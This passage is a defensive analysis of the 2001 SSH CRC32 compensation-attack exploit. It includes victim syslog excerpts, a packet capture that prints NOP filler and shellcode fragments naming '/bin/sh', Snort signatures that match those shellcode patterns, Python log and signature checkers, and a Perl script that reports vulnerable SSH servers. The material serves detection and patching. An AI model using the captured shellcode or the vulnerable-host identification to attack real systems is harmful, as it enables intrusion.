Nov 1 18:48:12 victim sshd[9598]: log: Connection from 10.10.10.10 port 33385
Nov 1 18:48:12 victim sshd[9597]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:12 victim sshd[9599]: log: Connection from 10.10.10.10 port 33386
Nov 1 18:48:12 victim sshd[9598]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:12 victim sshd[9600]: log: Connection from 10.10.10.10 port 33387
Nov 1 18:48:12 victim sshd[9599]: fatal: Local: crc32 compensation attack: network attack detected
Nov 1 18:48:13 victim sshd[9601]: log: Connection from 10.10.10.10 port 33388
Nov 1 18:48:13 victim sshd[9602]: log: Connection from 10.10.10.10 port 33389
Nov 1 18:48:13 victim sshd[9603]: log: Connection from 10.10.10.10 port 33390
Nov 1 18:48:14 victim sshd[9604]: log: Connection from 10.10.10.10 port 33391
Nov 1 18:48:14 victim sshd[9605]: log: Connection from 10.10.10.10 port 33392
Nov 1 18:48:15 victim sshd[9606]: log: Connection from 10.10.10.10 port 33393
Nov 1 18:48:15 victim sshd[9605]: fatal: Local: Corrupted check bytes on input.
Nov 1 18:48:15 victim sshd[9607]: log: Connection from 10.10.10.10 port 33394
Nov 1 18:48:16 victim sshd[9608]: log: Connection from 10.10.10.10 port 33395
Nov 1 18:48:16 victim sshd[9609]: log: Connection from 10.10.10.10 port 33396
Nov 1 18:48:16 victim sshd[9610]: log: Connection from 10.10.10.10 port 33397
Nov 1 18:48:17 victim sshd[9611]: log: Connection from 10.10.10.10 port 33398
Nov 1 18:48:17 victim sshd[9611]: fatal: Local: Corrupted check bytes on input.
Nov 1 18:48:17 victim sshd[9612]: log: Connection from 10.10.10.10 port 33399
Nov 1 18:48:18 victim sshd[9613]: log: Connection from 10.10.10.10 port 33400
Nov 1 18:48:18 victim sshd[9614]: log: Connection from 10.10.10.10 port 33401
Nov 1 18:58:18 victim sshd[9614]: fatal: Timeout before authentication.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Note the final log entry. When exploitation succeeds, the authentication process stops there, because the shellcode's backdoor is already running and the attacker can connect to its port and do anything. The one catch is that the SSH daemon (at least SSH.com 1.2.31) times out because authentication never completes, which closes the spawned shell. In general there is a 10-minute window before the parent process of the listening shell is closed.
Analysis of network traffic
=====================
Tcpdump was used to capture the attack shown above; the capture is saved in sshdx.dump and can be fed to an IDS to derive attack signatures. If your IDS cannot read tcpdump files, you can use "tcpreplay"[12] to replay the capture.
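As an added example, not part of the original analysis, the following Python parses sshd1 syslog lines of the kind shown above and grades each source address: a burst of connections or the detector's fatal messages mark an exploit attempt, and a detector hit followed by a session that ends with "Timeout before authentication" marks a probable compromise that warrants checking the host for a new listener. The sample log lines are constructed in the excerpt's format, and the year is an assumption because syslog omits it.

```python
"""Flag crc32 exploit activity in sshd1 syslog output.

Added example, not from the original analysis. The message texts are the
ones quoted in the log excerpt above (SSH.com 1.2.31 on Red Hat 6.0);
OpenSSH words its messages differently, so the patterns would need adjusting.
"""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List, Optional

VERDICT_BENIGN = "benign"
VERDICT_ATTEMPT = "exploit-attempt"
VERDICT_COMPROMISE = "probable-compromise"

LINE_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2})\s+(?P<time>\d\d:\d\d:\d\d)\s+"
    r"(?P<host>\S+)\s+sshd\[(?P<pid>\d+)\]:\s+(?P<msg>.*)$")
CONN_RE = re.compile(r"^log: Connection from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+$")
DETECTOR_MSGS = {
    "fatal: Local: crc32 compensation attack: network attack detected",
    "fatal: Local: Corrupted check bytes on input.",
}
TIMEOUT_MSG = "fatal: Timeout before authentication."

# Constructed sample in the format of the excerpt above; pids and ports are
# made up, and 10.10.10.2 stands in for an ordinary client.
SAMPLE_LOG = """\
Nov  1 18:48:06 victim sshd[9581]: log: Connection from 10.10.10.10 port 33368
Nov  1 18:48:07 victim sshd[9584]: log: Connection from 10.10.10.10 port 33371
Nov  1 18:48:07 victim sshd[9585]: log: Connection from 10.10.10.10 port 33372
Nov  1 18:48:08 victim sshd[9586]: log: Connection from 10.10.10.10 port 33373
Nov  1 18:48:08 victim sshd[9586]: fatal: Local: crc32 compensation attack: network attack detected
Nov  1 18:48:08 victim sshd[9585]: fatal: Local: crc32 compensation attack: network attack detected
Nov  1 18:48:09 victim sshd[9584]: fatal: Local: crc32 compensation attack: network attack detected
Nov  1 18:48:15 victim sshd[9605]: log: Connection from 10.10.10.10 port 33392
Nov  1 18:48:15 victim sshd[9605]: fatal: Local: Corrupted check bytes on input.
Nov  1 18:48:18 victim sshd[9614]: log: Connection from 10.10.10.10 port 33401
Nov  1 18:50:02 victim sshd[9620]: log: Connection from 10.10.10.2 port 40111
Nov  1 18:58:18 victim sshd[9614]: fatal: Timeout before authentication.
"""


@dataclass
class SourceReport:
    connections: int = 0
    detector_fatals: int = 0           # detector fired or check bytes corrupted
    unfinished_auth_timeouts: int = 0  # session ended without authenticating
    first_seen: Optional[datetime] = None
    last_seen: Optional[datetime] = None
    verdict: str = VERDICT_BENIGN


def analyse(log_text: str, year: int = 2001,
            burst_conns: int = 5, burst_window_s: int = 60) -> Dict[str, SourceReport]:
    """Attribute each fatal to its source via the pid of the 'Connection from'
    line, then grade every source. 'year' is needed because syslog omits it."""
    reports: Dict[str, SourceReport] = defaultdict(SourceReport)
    pid_to_ip: Dict[str, str] = {}
    conn_times: Dict[str, List[datetime]] = defaultdict(list)

    for raw in log_text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue
        ts = datetime.strptime(f"{m['mon']} {m['day']} {m['time']} {year}",
                               "%b %d %H:%M:%S %Y")
        pid, msg = m["pid"], m["msg"]
        conn = CONN_RE.match(msg)
        if conn:
            ip = conn["ip"]
            pid_to_ip[pid] = ip
            rep = reports[ip]
            rep.connections += 1
            rep.first_seen = rep.first_seen or ts
            rep.last_seen = ts
            conn_times[ip].append(ts)
            continue
        ip = pid_to_ip.get(pid)
        if ip is None:
            continue  # fatal for a session whose connection line is not in this excerpt
        if msg in DETECTOR_MSGS:
            reports[ip].detector_fatals += 1
        elif msg == TIMEOUT_MSG:
            reports[ip].unfinished_auth_timeouts += 1

    for ip, rep in reports.items():
        times = conn_times[ip]
        bursty = any(
            (times[i + burst_conns - 1] - times[i]).total_seconds() <= burst_window_s
            for i in range(len(times) - burst_conns + 1))
        if rep.detector_fatals and rep.unfinished_auth_timeouts:
            # the pattern at the end of the excerpt: the detector fired on earlier
            # attempts, then one session stopped before ever authenticating
            rep.verdict = VERDICT_COMPROMISE
        elif rep.detector_fatals or bursty:
            rep.verdict = VERDICT_ATTEMPT
    return dict(reports)


if __name__ == "__main__":
    for ip, rep in analyse(SAMPLE_LOG).items():
        print(f"{ip}: {rep.verdict} ({rep.connections} connections, "
              f"{rep.detector_fatals} detector fatals, "
              f"{rep.unfinished_auth_timeouts} auth timeouts)")
```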
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# tcpdump -s1500 -w sshdx.dump ip host 10.10.10.3 &
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This makes it easy to review the many connections made to the SSH daemon; with "ngrep"[5] one can pick out the final connection and the brute-force attempts that insert the shellcode:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
. . .
T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP]
SSH-1.5-1.2.31.
T 10.10.10.10:32957 -> 10.10.10.3:2222 [AP]
SSH-1.5-OpenSSH_2.2.0p1.
T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP]
............GA..@.......%....`..P.....D&..2.+7#...1!?..c.r).8.^.h.....
..I..b6..9.f........N..0....:BAh@s.e...H......(.D2.Zg......#.......\.j
W...O$....6.......$...V..;...U.@Y.K2.p<\..o..?..l.........*.p.K<s..,..
.@7.wBBy......1.i..%".....G*g.G.t(......M........[.......J......<.
T 10.10.10.10:32957 -> 10.10.10.3:2222 [AP]
............GA..@.....`G.Fg.g.!.i.}..........._.e....=../..6....;....)
T..... c...#W.\wve.cy .n.....q.Sc....}..".N.G.w"....n.../#.....8x..&.Z
....Q/.......8..
T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP]
.........4..
T 10.10.10.10:32957 -> 10.10.10.3:2222 [A]
..W...2.......2.......2.......2.......2.......2.......2.......2.......
2.......2.......2.......2.......2.......2.......2.......2.......2 ....
..2!......2$......2%......2(......2)......2,......2-......20......21..
....24......25......28......29......2<......2=......2@......2A......2D
......2E......2H......2I......2L......2M......2P......2Q......2T......
2U......2X......2Y......2\......2]......2`......2a......2d......2e....
..2h......2i......2l......2m......2p......2q......2t......2u......2x..
....2y......2 ......2}......2.......2.......2.......2.......2.......2.
......2.......2.......2.......2.......2.......2.......2.......2.......
2.......2.......2.......2.......2.......2.......2.......2.......2.....
..2.......2.......2.......2.......2.......2.......2.......2.......2...
....2.......2.......2.......2.......2.......2.......2.......2.......2.
......2.......2.......2.......2.......2.......2.......2.......2.......
2.......2.......2.......2.......2.......2.......2.......2.......2.....
..2.......2.......2.......2.......2.......2.......3.......3.......3...
....3.......3.......3.......3.......3.......3.......3.......3.......3.
......3.......3.......3.......3.......3 ......3!......3$......3%......
3(......3)......3,......3-......30......31......34......35......38....
..39......3<......3=......3@......3A......3D......3E......3H......3I..
....3L......3M......3P......3Q......3T......3U......3X......3Y......3\
......3]......3`......3a......3d........1...p}.@
T 10.10.10.10:32957 -> 10.10.10.3:2222 [A]
......3i......3l......3m......3p......3q......3t......3u......3x......
3y......3 ......3}......3.......3.......3.......3.......3.......3.....
..3.......3.......3.......3.......3.......3.......3.......3.......3...
....3.......3.......3.......3.......3.......3.......3.......3.......3.
......3.......3.......3.......3.......3.......3.......3.......3.......
3.......3.......3.......3.......3.......3.......3.......3.......3.....
..3.......3.......3.......3.......3.......3.......3.......3.......3...
....3.......3.......3.......3.......3.......3.......3.......3.......3.
......3.......3.......3.......3.......3.......4.......4.......4.......
4.......4.......4.......4.......4.......4.......4.......4.......4.....
..4.......4.......4.......4.......4 ......4!......4$......4%......4(..
....4)......4,......4-......40......41......44......45......48......49
......4<......4=......4@......4A......4D......4E......4H......4I......
4L......4M......4P......4Q......4T......4U......4X......4Y......4\....
..4]......4`......4a......4d......4e......4h......4i......4l......4m..
....4p......4q......4t......4u......4x......4y......4 ......4}......4.
......4.......4.......4.......4.......4.......4.......4.......4.......
4.......4.......4.......4.......4.......4.......4.......4.......4.....
..4.......4.......4.......4.......4.......4.......4.......4.......4...
....4.......4.......4.......4.......4.......4.......4.......4.......4.
......4.......4.......4.......4.........1...p}.@
. . .
T 10.10.10.10:32957 -> 10.10.10.3:2222 [A]
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
.....................1..f..1...C.].C.].K.M..M...1..E.Cf.].f.E.09.M..E.
.E..E.....M.....CC....C....1..?......A....^.u.1..F..E......M..U.......
./bin/sh.h0h0h0, 7350, zip/TESO!......................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
........................................1...p}.@
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
For this exploit you can therefore match on strings such as "h0h0h0, 7350, zip/TESO!" [7] and on the NOP sled. The following signatures were written by Marty Roesch and Brian Caswell and work with Snort v1.8 or later[6]:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \
(msg:"EXPLOIT ssh CRC32 overflow /bin/sh"; \
flags:A+; content:"/bin/sh"; \
reference:bugtraq,2347; reference:cve,CVE-2001-0144; \
classtype:shellcode-detect;)
alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \
(msg:"EXPLOIT ssh CRC32 overflow filler"; \
flags:A+; content:"|00 00 00 00 00 00 00 00 00 00 00 00 00|"; \
reference:bugtraq,2347; reference:cve,CVE-2001-0144; \
classtype:shellcode-detect;)
alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \
(msg:"EXPLOIT ssh CRC32 overflow NOOP"; \
flags:A+; content:"|90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90|"; \
reference:bugtraq,2347; reference:cve,CVE-2001-0144; \
classtype:shellcode-detect;)
alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \
(msg:"EXPLOIT ssh CRC32 overflow"; \
flags:A+; content:"|00 01 57 00 00 00 18|"; offset:0; depth:7; \
content:"|FF FF FF FF 00 00|"; offset:8; depth:14; \
reference:bugtraq,2347; reference:cve,CVE-2001-0144; \
classtype:shellcode-detect;)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
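To see exactly what the four rules above test for, here is an added example (not code from the original analysis, and not Snort code) that re-implements the subset of Snort rule semantics they use: a `content:` match anywhere in the payload, or confined to `depth` bytes starting at `offset`. The two payloads are constructed for the example, not captured traffic; the port-22 and `flags:A+` conditions are assumed to have been checked before a payload reaches `match_rules()`.

```python
"""Re-implement the content/offset/depth checks of the four Snort rules
above and run them over constructed TCP payloads.

Added example: this is not code from the original analysis or from Snort.
It models only the subset of Snort rule semantics those rules use.
"""
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Content:
    """One content: check. offset/depth follow Snort: start searching at
    `offset` and look at no more than `depth` bytes from there."""
    pattern: bytes
    offset: int = 0
    depth: Optional[int] = None


def content_matches(payload: bytes, check: Content) -> bool:
    """True if the pattern occurs inside the search window of the payload."""
    end = None if check.depth is None else check.offset + check.depth
    window = payload[check.offset:end]
    return check.pattern in window


# The four rules from the text, transcribed into (msg, [content checks]).
RULES: List[Tuple[str, List[Content]]] = [
    ("EXPLOIT ssh CRC32 overflow /bin/sh", [Content(b"/bin/sh")]),
    ("EXPLOIT ssh CRC32 overflow filler", [Content(b"\x00" * 13)]),
    ("EXPLOIT ssh CRC32 overflow NOOP", [Content(b"\x90" * 16)]),
    ("EXPLOIT ssh CRC32 overflow", [
        Content(bytes.fromhex("00 01 57 00 00 00 18"), offset=0, depth=7),
        Content(bytes.fromhex("ff ff ff ff 00 00"), offset=8, depth=14),
    ]),
]


def match_rules(payload: bytes) -> List[str]:
    """Return the msg of every rule whose content checks all succeed,
    in rule order (a payload may trigger more than one rule)."""
    return [msg for msg, checks in RULES
            if all(content_matches(payload, c) for c in checks)]


# Constructed sample payloads, not captured traffic.
# A normal server identification string as exchanged on port 22.
BENIGN_BANNER = b"SSH-1.99-OpenSSH_2.9p2\r\n"
# The first 28 bytes of a packet laid out so that both anchored checks of
# the fourth rule line up: 7 signature bytes at offset 0, one filler byte,
# 6 signature bytes at offset 8, then zero padding. The padding also
# satisfies the 13-zero "filler" rule, which is why two rules fire.
SUSPECT_HEAD = (bytes.fromhex("00 01 57 00 00 00 18")
                + b"\x00"
                + bytes.fromhex("ff ff ff ff 00 00")
                + b"\x00" * 14)

if __name__ == "__main__":
    for name, pkt in (("benign banner", BENIGN_BANNER),
                      ("suspect head", SUSPECT_HEAD)):
        print(f"{name}: {match_rules(pkt) or ['no match']}")
```

The fourth rule is the most specific of the four because both of its checks must land at fixed offsets; the first three fire on any occurrence of their string anywhere in the payload, so expect them to be the noisier ones when tuning.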
Identifying whether your hosts are vulnerable
=============================================
You can use Jeremy Mates' ssh_scan.pl [8] and Niels Provos' ScanSSH scanner [9] to identify SSH services and their versions.
Russell Fulton has also published an Argus [10] log-processing script, included in the appendix below.
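Once a scanner has collected the banners, the step that matters is reading the version out of each one and deciding whether that server can still be reached over protocol 1. The following is an added example (not code from the original analysis, nor from ssh_scan.pl or ScanSSH) that parses banners in the "ip host banner" layout used by the ssh-report script in Appendix A and classifies them. It generalises the affected/not-affected table in that script into version ranges: ssh.com 1.2.24 through 1.2.31 and OpenSSH releases before 2.3.0 are treated as affected, ssh.com 2.0.11 through 3.0.1 as affected with version 1 fallback, and anything outside those ranges as unknown. The scan lines and host names are constructed for the example.

```python
"""Parse SSH identification banners from scan output and classify them.

Added example, not part of the original analysis. The version ranges
generalise the ssh-report table in Appendix A; hosts below are constructed.
"""
import re
from typing import Dict, List, Optional, Tuple

# SSH-<protoversion>-<softwareversion>[ comments]
BANNER_RE = re.compile(r"^SSH-(?P<proto>\d+\.\d+)-(?P<software>\S+)")


def parse_banner(banner: str) -> Optional[Tuple[str, str]]:
    """Return (protoversion, softwareversion) or None if not an SSH banner."""
    m = BANNER_RE.match(banner)
    return (m.group("proto"), m.group("software")) if m else None


def version_key(text: str):
    """Make '1.2.31a' or '2.9p2' comparable: numeric runs compare as ints,
    letter runs as strings, so 1.2.31 < 1.2.31a and 2.2.0p1 < 2.3.0."""
    parts = re.findall(r"\d+|[A-Za-z]+", text)
    return tuple((0, int(p)) if p.isdigit() else (1, p) for p in parts)


def classify(banner: str) -> str:
    """Map one banner to the status vocabulary used by ssh-report."""
    parsed = parse_banner(banner)
    if parsed is None:           # "timeout", "Couldn't", etc.
        return "unknown"
    _proto, software = parsed
    m = re.match(r"OpenSSH[-_](\S+)", software)
    if m:                        # OpenSSH fixed the detector in 2.3.0
        return ("affected" if version_key(m.group(1)) < version_key("2.3.0")
                else "not affected")
    if re.match(r"\d", software):  # ssh.com releases carry a bare number
        v = version_key(software)
        if version_key("1.2.24") <= v <= version_key("1.2.31"):
            return "affected"
        if version_key("2.0.11") <= v <= version_key("3.0.1"):
            return "affected w/Version 1 fallback"
        if (version_key("1.2.14") <= v < version_key("1.2.24")
                or version_key("1.2.31") < v < version_key("2.0")):
            return "not affected"
    return "unknown"             # vendor builds (Cisco, OSU, ...) and the rest


# Constructed scan output in the layout ssh-report reads (ip host banner).
CONSTRUCTED_SCAN = """\
10.0.0.1 beavertail.dept.foo.edu SSH-1.5-1.2.31
10.0.0.3 marktwain.dept.foo.edu SSH-1.99-OpenSSH_2.5.2p2
10.0.0.11 hobbes.dept.foo.edu SSH-1.99-OpenSSH_2.1.1
10.0.0.30 router.dept.foo.edu SSH-1.5-Cisco-1.25
10.0.0.40 filer.dept.foo.edu SSH-2.0-2.4.0
10.0.0.50 closed.dept.foo.edu timeout
"""


def report(scan_text: str, include_all: bool = False) -> Dict[str, List[str]]:
    """Group hosts by banner and status; like ssh-report, servers that are
    'not affected' are dropped unless include_all is set."""
    groups: Dict[str, List[str]] = {}
    for line in scan_text.splitlines():
        fields = line.split()
        if len(fields) < 3:
            continue
        ip, host, banner = fields[0], fields[1], fields[2]
        status = classify(banner)
        if status == "not affected" and not include_all:
            continue
        groups.setdefault(f"{banner} ({status})", []).append(f"{host}({ip})")
    return groups


if __name__ == "__main__":
    for heading, hosts in report(CONSTRUCTED_SCAN).items():
        print(f"\n{heading}")
        for h in hosts:
            print(f"    {h}")
```

The comparison key is the part worth keeping: a naive string comparison puts "1.2.31a" before "1.2.31" and "2.9p2" after "2.10", which is exactly the kind of mistake that leaves a patched server listed as affected or an unpatched one silently dropped.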
----------------------------------------------------------------------------
References
==========
[1] Portable Linux Amazing CD (PLAC) v2.9.1pre2, by Fred Cohen
http://www.all.net/ForensiX/plac.html
[2] Netcat, by der Hobbit
http://www.l0pht.com/~weld/netcat/
[3] Reverse Engineer's Query Tool
http://packetstormsecurity.org/linux/reverse-engineering/reqt-0.7f.tar.gz
[4] LiSt Open Files (lsof)
http://sunsite.securitycentralhq.com/mirrors/security/lsof/lsof.tar.gz
[5] ngrep, by Jordan Ritter
http://www.packetfactory.net/projects/ngrep/
[6] Snort
http://www.snort.org/
[7] 7350.org / 7350
http://www.7350.org/
http://www.team-teso.org/about.php (see the bottom)
[8] ssh_scan.pl, by Jeremy Mates
http://sial.org/code/perl/scripts/ssh_scan.pl.html
[9] ScanSSH scanner, by Niels Provos
http://www.monkey.org/~provos/scanssh/
[10] Argus - network traffic auditing tool
http://www.pl.freebsd.org/es/ports/net.html#argus-1.8.1
[11] tcpdump
http://staff.washington.edu/dittrich/misc/sshdx.dump
[12] tcpreplay
http://packages.debian.org/testing/net/tcpreplay.html
Appendix A
==========
The two scan scripts follow.
=-=-=-=-=-=-=-=-=-=-=-=-=-=- cut here -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#!/usr/bin/perl
#
# ssh-report
#
# Dave Dittrich <dittrich@cac.washington.edu>
# Thu Nov 8 21:39:20 PST 2001
#
# Process output of scans for SSH servers, with version identifying
# information, into two level break report format by SSH version.
#
# This script operates on a list of scan results that look
# like this:
#
# % cat scanresults
# 10.0.0.1 beavertail.dept.foo.edu SSH-1.5-1.2.31
# 10.0.0.2 lumpysoup.dept.foo.edu SSH-1.5-1.2.31
# 10.0.0.3 marktwain.dept.foo.edu SSH-1.99-OpenSSH_2.5.2p2
# 10.0.0.4 junebug.dept.foo.edu SSH-1.5-1.2.31
# 10.0.0.10 calvin.dept.foo.edu SSH-1.99-OpenSSH_2.5.2p2
# 10.0.0.11 hobbes.dept.foo.edu SSH-1.99-OpenSSH_2.1.1
# 10.0.0.20 willow.dept.foo.edu SSH-1.99-OpenSSH_2.9p2
# 10.0.0.21 berry.dept.foo.edu SSH-1.99-OpenSSH_2.9p2
# 10.0.0.23 whimpy.dept.foo.edu SSH-1.99-OpenSSH_2.9p2
#
# The resulting report (without the "-a" flag) will look like this:
#
# % ssh-report < scanresults
#
# SSH-1.5-1.2.31 (affected)
# beavertail.dept.foo.edu(10.0.0.1)
# lumpysoup.dept.foo.edu(10.0.0.2)
# junebug.dept.foo.edu(10.0.0.4)
#
#
# SSH-1.99-OpenSSH_2.1.1 (affected)
# hobbes.dept.foo.edu(10.0.0.11)
#
# By default, this script will only report on those systems that
# are running potentially vulnerable SSH servers. Use the "-a"
# option to report on all servers. Use "grep -v" to filter out
# hosts *before* you run them through this reporting script.
#
# SSH servers are considered "affected" if they are known, by being
# listed in one or more of the following references, to have the crc32
# compensation attack detector vulnerability:
#
# http://www.kb.cert.org/vuls/id/945216
# http://www.securityfocus.com/bid/2347/
# http://xforce.iss.net/alerts/advise100.php
# http://www.ssh.com/products/ssh/advisories/ssh1_crc-32.cfm
#
# You also may need to adjust the logic below to lump systems
# into the "Unknown" category correctly (e.g., if your server
# has a custom version string, access control, etc.)
#
# The list below of servers and potential vulnerability was derived by
# summarizing existing versions on a set of production networks and
# using the advisories and reference material listed above. You
# should update this list as new information is obtained, or if new
# versions of the SSH server are found on your network.
%affected = (
'Unknown', 'unknown',
'SSH-1.4-1.2.14', 'not affected',
'SSH-1.4-1.2.15', 'not affected',
'SSH-1.4-1.2.16', 'not affected',
'SSH-1.5-1.2.17', 'not affected',
'SSH-1.5-1.2.18', 'not affected',
'SSH-1.5-1.2.19', 'not affected',
'SSH-1.5-1.2.20', 'not affected',
'SSH-1.5-1.2.21', 'not affected',
'SSH-1.5-1.2.22', 'not affected',
'SSH-1.5-1.2.23', 'not affected',
'SSH-1.5-1.2.24', 'affected',
'SSH-1.5-1.2.25', 'affected',
'SSH-1.5-1.2.26', 'affected',
'SSH-1.5-1.2.27', 'affected',
'SSH-1.5-1.2.28', 'affected',
'SSH-1.5-1.2.29', 'affected',
'SSH-1.5-1.2.30', 'affected',
'SSH-1.5-1.2.31', 'affected',
'SSH-1.5-1.2.31a', 'not affected',
'SSH-1.5-1.2.32', 'not affected',
'SSH-1.5-1.3.7', 'not affected',
'SSH-1.5-Cisco-1.25', 'unknown',
'SSH-1.5-OSU_1.5alpha1', 'unknown',
'SSH-1.5-OpenSSH-1.2', 'affected',
'SSH-1.5-OpenSSH-1.2.1', 'affected',
'SSH-1.5-OpenSSH-1.2.2', 'affected',
'SSH-1.5-OpenSSH-1.2.3', 'affected',
'SSH-1.5-OpenSSH_2.5.1', 'not affected',
'SSH-1.5-OpenSSH_2.5.1p1', 'not affected',
'SSH-1.5-OpenSSH_2.9p1', 'not affected',
'SSH-1.5-OpenSSH_2.9p2', 'not affected',
'SSH-1.5-RemotelyAnywhere', 'not affected',
'SSH-1.99-2.0.11', 'affected w/Version 1 fallback',
'SSH-1.99-2.0.12', 'affected w/Version 1 fallback',
'SSH-1.99-2.0.13', 'affected w/Version 1 fallback',
'SSH-1.99-2.1.0.pl2', 'affected w/Version 1 fallback',
'SSH-1.99-2.1.0', 'affected w/Version 1 fallback',
'SSH-1.99-2.2.0', 'affected w/Version 1 fallback',
'SSH-1.99-2.3.0', 'affected w/Version 1 fallback',
'SSH-1.99-2.4.0', 'affected w/Version 1 fallback',
'SSH-1.99-3.0.0', 'affected w/Version 1 fallback',
'SSH-1.99-3.0.1', 'affected w/Version 1 fallback',
'SSH-1.99-OpenSSH-2.1', 'affected',
'SSH-1.99-OpenSSH_2.1.1', 'affected',
'SSH-1.99-OpenSSH_2.2.0', 'affected',
'SSH-1.99-OpenSSH_2.2.0p1', 'affected',
'SSH-1.99-OpenSSH_2.3.0', 'not affected',
'SSH-1.99-OpenSSH_2.3.0p1', 'not affected',
'SSH-1.99-OpenSSH_2.5.1', 'not affected',
'SSH-1.99-OpenSSH_2.5.1p1', 'not affected',
'SSH-1.99-OpenSSH_2.5.1p2', 'not affected',
'SSH-1.99-OpenSSH_2.5.2p2', 'not affected',
'SSH-1.99-OpenSSH_2.9.9p2', 'not affected',
'SSH-1.99-OpenSSH_2.9', 'not affected',
'SSH-1.99-OpenSSH_2.9p1', 'not affected',
'SSH-1.99-OpenSSH_2.9p2', 'not affected',
'SSH-1.99-OpenSSH_3.0p1', 'not affected',
'SSH-2.0-1.1.1', 'unknown',
'SSH-2.0-2.3.0', 'affected w/Version 1 fallback',
'SSH-2.0-2.4.0', 'affected w/Version 1 fallback',
'SSH-2.0-3.0.0', 'affected w/Version 1 fallback',
'SSH-2.0-3.0.1', 'affected w/Version 1 fallback',
'SSH-2.0-OpenSSH_2.5.1p1', 'not affected',
'SSH-2.0-OpenSSH_2.5.2p2', 'not affected',
'SSH-2.0-OpenSSH_2.9.9p2', 'not affected',
'SSH-2.0-OpenSSH_2.9p2', 'not affected',
);
# Make SURE you read the code first.
&IKnowWhatImDoing();
$all++, shift(@ARGV) if $ARGV[0] eq "-a";
while (<>) {
    chomp;
    s/\s+/ /g;
    ($ip, $host, $version) = split(' ', $_);
    next unless defined $version;    # skip blank or truncated lines
    # Adjust this to identify other strings reported
    # by servers that have access restrictions, etc.
    # in place and do not show a specific version number.
    # They all fall under the category "Unknown" in this case.
    $version = "Unknown"
        if ($version eq "Couldn't" ||
            $version eq "Unknown" ||
            $version eq "You" ||
            $version eq "timeout");
    # Key on "version:ip" so that sorting the keys groups hosts by version.
    $server{"$version:$ip"} = $host;
}
foreach $i (sort keys %server) {
    ($version, $ip) = split(":", $i);
    # Versions missing from the %affected table are reported as "unknown".
    $affected{$version} = 'unknown' unless defined $affected{$version};
    next if ($affected{$version} eq "not affected" && ! $all);
    # Print a new group header each time the version changes.
    printf("\n\n%s (%s)\n", $version, $affected{$version})
        if ($curver ne $version);
    $curver = $version;
    print "    " . $server{$i} . "($ip)\n";
}
exit(0);
sub IKnowWhatImDoing {
local $IKnowWhatImDoing = 0;
# Uncomment the following line to make this script work.
# $IKnowWhatImDoing++;
die "I told you to read the code first, didn't I?\n"
unless $IKnowWhatImDoing;
return;
}
=-=-=-=-=-=-=-=-=-=-=-=-=-=- cut here -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=